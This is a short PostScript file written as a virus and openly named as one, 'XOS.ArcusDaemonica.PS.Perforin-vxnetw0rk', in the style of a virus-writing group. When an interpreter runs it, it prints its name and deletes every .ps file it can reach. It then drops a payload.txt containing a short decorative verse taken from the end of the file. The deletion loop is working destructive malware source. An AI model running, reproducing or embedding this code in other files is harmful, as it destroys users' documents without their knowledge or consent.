%!PS
/Courier                                                    % use Courier as the display font
20 selectfont                           
72 500 moveto                                               % where to put our text
(XOS.ArcusDaemonica.PS.Perforin-vxnetw0rk) show             % show Virus name
(*.ps) {dup print flush deletefile} 100 string              % delete every PS file
filenameforall 
/filename (payload.txt) def                                 % create payload
filename status {4 {pop} repeat filename deletefile} if
/mfn filename (w) file def
/buffer 1024 string def
/bf {{currentfile buffer readstring pop dup length 0 eq
{pop mfn closefile exit}{mfn exch writestring}ifelse
} loop}def                                                  % loop through this file
bf
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ One unbreakable shield against the coming darkness +
+ One last blade forged in defiance of fate          +
+ Let them be my legacy to the galaxy I conquered    +
+ And my final gift to the species I failed          +
++++++++++++++++++++++++++++++++++++++++++++++++++++++
